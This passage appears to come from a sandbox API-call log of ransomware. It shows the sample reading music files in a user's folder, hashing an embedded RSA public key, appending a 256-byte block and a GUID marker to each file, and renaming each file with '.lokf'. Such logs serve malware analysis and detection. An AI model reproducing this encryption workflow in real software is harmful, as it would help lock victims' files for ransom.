KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.834] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.835] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.835] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.835] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.835] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.835] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.835] GetLastError () returned 0x0 [0060.835] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.835] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.835] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.835] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.835] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.835] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.835] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.836] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11207, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.836] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.836] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.836] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.836] CloseHandle (hObject=0x5cc) returned 1 [0060.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.837] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OQFFt8mL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\oqfft8ml.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OQFFt8mL.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\oqfft8ml.mp3.lokf")) returned 1 [0060.839] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc671250, ftCreationTime.dwHighDateTime=0x1d4d088, ftLastAccessTime.dwLowDateTime=0xd48d2600, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0xd48d2600, ftLastWriteTime.dwHighDateTime=0x1d4d3d2, nFileSizeHigh=0x0, nFileSizeLow=0xaec4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sviI.wav", cAlternateFileName="")) returned 1 [0060.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.839] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\sviI.wav") returned=".wav" [0060.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\sviI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\svii.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.839] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=44740) returned 1 [0060.839] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.841] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xae9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.841] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.842] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.842] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xaec4, lpOverlapped=0x0) returned 1 [0060.842] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.842] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.843] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.843] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.843] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.843] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.843] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.843] GetLastError () returned 0x0 [0060.844] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.844] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.844] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.844] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.844] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.844] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.844] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xaec4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.844] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.845] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.845] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.845] CloseHandle (hObject=0x5cc) returned 1 [0060.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0060.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.846] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\sviI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\svii.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\sviI.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\svii.wav.lokf")) returned 1 [0060.847] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e4c3670, ftCreationTime.dwHighDateTime=0x1d4d32f, ftLastAccessTime.dwLowDateTime=0x567587c0, ftLastAccessTime.dwHighDateTime=0x1d4cfaa, ftLastWriteTime.dwLowDateTime=0x567587c0, ftLastWriteTime.dwHighDateTime=0x1d4cfaa, nFileSizeHigh=0x0, nFileSizeLow=0xeec1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y2sSLYuc0kUZqjX3V0a.wav", cAlternateFileName="Y2SSLY~1.WAV")) returned 1 [0060.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.847] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\y2sSLYuc0kUZqjX3V0a.wav") returned=".wav" [0060.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\y2sSLYuc0kUZqjX3V0a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\y2sslyuc0kuzqjx3v0a.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.848] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=61121) returned 1 [0060.848] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.850] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xee9b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.850] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.851] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xeec1, lpOverlapped=0x0) returned 1 [0060.851] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.851] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.851] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.851] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.852] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.852] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.852] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.852] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.852] GetLastError () returned 0x0 [0060.852] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.852] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.852] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.852] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.853] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.853] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.853] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xeec1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.853] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.854] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.854] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.854] CloseHandle (hObject=0x5cc) returned 1 [0060.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0060.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e0) returned 0x326aa18 [0060.855] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\y2sSLYuc0kUZqjX3V0a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\y2sslyuc0kuzqjx3v0a.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\y2sSLYuc0kUZqjX3V0a.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\y2sslyuc0kuzqjx3v0a.wav.lokf")) returned 1 [0060.856] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e4c3670, ftCreationTime.dwHighDateTime=0x1d4d32f, ftLastAccessTime.dwLowDateTime=0x567587c0, ftLastAccessTime.dwHighDateTime=0x1d4cfaa, ftLastWriteTime.dwLowDateTime=0x567587c0, ftLastWriteTime.dwHighDateTime=0x1d4cfaa, nFileSizeHigh=0x0, nFileSizeLow=0xeec1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y2sSLYuc0kUZqjX3V0a.wav", cAlternateFileName="Y2SSLY~1.WAV")) returned 0 [0060.856] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.856] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.857] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 